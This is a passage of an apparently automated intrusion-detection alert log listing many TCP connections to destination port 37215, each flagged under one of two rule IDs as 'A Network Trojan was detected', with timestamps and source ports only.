          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081141
          SID:2829579
          Source Port:52066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539000
          SID:2829579
          Source Port:60070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719403
          SID:2835222
          Source Port:45076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163826
          SID:2835222
          Source Port:40210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.467149
          SID:2829579
          Source Port:35428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.863933
          SID:2835222
          Source Port:41118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224312
          SID:2835222
          Source Port:57676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945466
          SID:2835222
          Source Port:57328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.032755
          SID:2835222
          Source Port:37096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539847
          SID:2835222
          Source Port:42040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398363
          SID:2835222
          Source Port:57746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226369
          SID:2835222
          Source Port:38802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819952
          SID:2835222
          Source Port:60624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223062
          SID:2835222
          Source Port:35360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.922130
          SID:2829579
          Source Port:59750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.921278
          SID:2835222
          Source Port:53682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.157107
          SID:2835222
          Source Port:46834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820703
          SID:2835222
          Source Port:55886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.242679
          SID:2835222
          Source Port:55126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721604
          SID:2835222
          Source Port:58892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643772
          SID:2829579
          Source Port:32828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.986563
          SID:2835222
          Source Port:36892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.996200
          SID:2835222
          Source Port:45138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.910669
          SID:2829579
          Source Port:58304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.088679
          SID:2829579
          Source Port:55544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.300759
          SID:2829579
          Source Port:43724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033911
          SID:2829579
          Source Port:50432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.277275
          SID:2829579
          Source Port:49250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103971
          SID:2829579
          Source Port:57522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396403
          SID:2835222
          Source Port:59556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.156936
          SID:2835222
          Source Port:47710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.027081
          SID:2835222
          Source Port:49024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945352
          SID:2829579
          Source Port:48624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166419
          SID:2835222
          Source Port:53288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396570
          SID:2829579
          Source Port:45074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166833
          SID:2829579
          Source Port:47922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644859
          SID:2829579
          Source Port:42816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418335
          SID:2829579
          Source Port:50612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923634
          SID:2835222
          Source Port:48788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.601873
          SID:2835222
          Source Port:38722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038937
          SID:2829579
          Source Port:54746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465419
          SID:2829579
          Source Port:57616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.243529
          SID:2835222
          Source Port:50660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713613
          SID:2835222
          Source Port:38384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.887843
          SID:2829579
          Source Port:34690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230248
          SID:2829579
          Source Port:51628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035506
          SID:2829579
          Source Port:52266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944450
          SID:2829579
          Source Port:45744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.563429
          SID:2835222
          Source Port:50902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.207743
          SID:2835222
          Source Port:60260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.993150
          SID:2829579
          Source Port:60914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.571571
          SID:2829579
          Source Port:58112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.864351
          SID:2835222
          Source Port:45182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.602544
          SID:2835222
          Source Port:43930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.568396
          SID:2829579
          Source Port:59698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.899276
          SID:2829579
          Source Port:53092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223272
          SID:2835222
          Source Port:55726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.571614
          SID:2829579
          Source Port:54570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035494
          SID:2829579
          Source Port:41986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.083056
          SID:2835222
          Source Port:34996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.041360
          SID:2829579
          Source Port:50604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819093
          SID:2829579
          Source Port:56314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035376
          SID:2829579
          Source Port:56722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.918924
          SID:2835222
          Source Port:44124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227105
          SID:2835222
          Source Port:56358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946619
          SID:2835222
          Source Port:49292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718696
          SID:2835222
          Source Port:49102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929603
          SID:2835222
          Source Port:37216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.860347
          SID:2829579
          Source Port:60788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.916854
          SID:2829579
          Source Port:42864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415156
          SID:2829579
          Source Port:34812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.604228
          SID:2829579
          Source Port:57974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.606923
          SID:2835222
          Source Port:59428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.105325
          SID:2829579
          Source Port:58596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075702
          SID:2829579
          Source Port:35992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643946
          SID:2835222
          Source Port:45608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600314
          SID:2835222
          Source Port:37880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225763
          SID:2829579
          Source Port:40650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.660856
          SID:2829579
          Source Port:55626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721705
          SID:2829579
          Source Port:58870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539623
          SID:2835222
          Source Port:54354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.073809
          SID:2829579
          Source Port:50764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945678
          SID:2829579
          Source Port:55146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.564147
          SID:2829579
          Source Port:50284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223267
          SID:2829579
          Source Port:49694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930059
          SID:2829579
          Source Port:43708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.477507
          SID:2829579
          Source Port:36014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414288
          SID:2835222
          Source Port:39788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244204
          SID:2835222
          Source Port:54212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720569
          SID:2829579
          Source Port:43382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.283493
          SID:2829579
          Source Port:35512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.985275
          SID:2835222
          Source Port:59426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412522
          SID:2829579
          Source Port:39726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.862785
          SID:2829579
          Source Port:35788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399284
          SID:2835222
          Source Port:51630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080666
          SID:2829579
          Source Port:42074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.989921
          SID:2835222
          Source Port:40884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720519
          SID:2829579
          Source Port:50822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283104
          SID:2829579
          Source Port:38100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.724274
          SID:2829579
          Source Port:41072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248763
          SID:2829579
          Source Port:35614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819122
          SID:2829579
          Source Port:53540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227262
          SID:2835222
          Source Port:48980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.608042
          SID:2835222
          Source Port:52116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.993794
          SID:2829579
          Source Port:51570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075429
          SID:2835222
          Source Port:44362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.076292
          SID:2829579
          Source Port:47564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274453
          SID:2835222
          Source Port:56660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.592834
          SID:2829579
          Source Port:48300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929183
          SID:2835222
          Source Port:55506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715474
          SID:2835222
          Source Port:37672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.563477
          SID:2829579
          Source Port:60262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945197
          SID:2829579
          Source Port:36352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719080
          SID:2829579
          Source Port:60570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.292404
          SID:2835222
          Source Port:32964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.087265
          SID:2829579
          Source Port:44202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472083
          SID:2829579
          Source Port:45300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.004143
          SID:2829579
          Source Port:34280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248846
          SID:2835222
          Source Port:60216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.296771
          SID:2835222
          Source Port:52926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.917960
          SID:2835222
          Source Port:35216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167413
          SID:2829579
          Source Port:43960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075662
          SID:2835222
          Source Port:56288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645986
          SID:2829579
          Source Port:37972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.298067
          SID:2829579
          Source Port:35986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558394
          SID:2835222
          Source Port:40494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.864579
          SID:2829579
          Source Port:48720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.098649
          SID:2835222
          Source Port:38482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.604197
          SID:2829579
          Source Port:54210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.490228
          SID:2829579
          Source Port:46636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.720154
          SID:2835222
          Source Port:34010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468732
          SID:2829579
          Source Port:43266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.285441
          SID:2835222
          Source Port:44308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.083275
          SID:2835222
          Source Port:58020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.209013
          SID:2835222
          Source Port:40632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.668532
          SID:2835222
          Source Port:58544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928821
          SID:2835222
          Source Port:51588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166131
          SID:2829579
          Source Port:58288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.294657
          SID:2835222
          Source Port:48706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478939
          SID:2835222
          Source Port:42742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206016
          SID:2829579
          Source Port:41522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.604863
          SID:2835222
          Source Port:43028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944145
          SID:2829579
          Source Port:55078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.085467
          SID:2835222
          Source Port:52060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163148
          SID:2829579
          Source Port:51974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540227
          SID:2829579
          Source Port:46890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822369
          SID:2835222
          Source Port:44002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947777
          SID:2835222
          Source Port:36474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104288
          SID:2835222
          Source Port:59744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.296135
          SID:2829579
          Source Port:43728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820948
          SID:2835222
          Source Port:45182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718434
          SID:2829579
          Source Port:56164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283064
          SID:2829579
          Source Port:54264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.281154
          SID:2835222
          Source Port:37086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928972
          SID:2829579
          Source Port:36538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.477292
          SID:2835222
          Source Port:40302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869956
          SID:2829579
          Source Port:56266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399638
          SID:2829579
          Source Port:45182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.131665
          SID:2835222
          Source Port:37580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206307
          SID:2835222
          Source Port:57804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.017463
          SID:2829579
          Source Port:54390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227696
          SID:2829579
          Source Port:35274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478723
          SID:2829579
          Source Port:36024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.039163
          SID:2829579
          Source Port:33040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.289227
          SID:2829579
          Source Port:53928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.594162
          SID:2835222
          Source Port:58116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.564984
          SID:2829579
          Source Port:50776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413021
          SID:2829579
          Source Port:43442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645825
          SID:2835222
          Source Port:39128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644123
          SID:2829579
          Source Port:60092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029823
          SID:2829579
          Source Port:39094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923103
          SID:2835222
          Source Port:57516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822216
          SID:2829579
          Source Port:36498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.920243
          SID:2835222
          Source Port:51248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168120
          SID:2835222
          Source Port:58254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822124
          SID:2829579
          Source Port:33340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.073638
          SID:2835222
          Source Port:57498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398883
          SID:2829579
          Source Port:40646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415554
          SID:2835222
          Source Port:41362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466278
          SID:2835222
          Source Port:49384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538832
          SID:2829579
          Source Port:57800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821808
          SID:2829579
          Source Port:48438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076502
          SID:2835222
          Source Port:42128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987899
          SID:2829579
          Source Port:47636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102990
          SID:2835222
          Source Port:57104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415001
          SID:2835222
          Source Port:39958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.653022
          SID:2835222
          Source Port:49112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.208203
          SID:2829579
          Source Port:41932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.290218
          SID:2835222
          Source Port:50220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080628
          SID:2835222
          Source Port:50940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160210
          SID:2829579
          Source Port:36936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415153
          SID:2829579
          Source Port:35290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.541551
          SID:2829579
          Source Port:35886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163984
          SID:2829579
          Source Port:42222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.250598
          SID:2829579
          Source Port:34900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931312
          SID:2835222
          Source Port:49312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945697
          SID:2835222
          Source Port:51480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
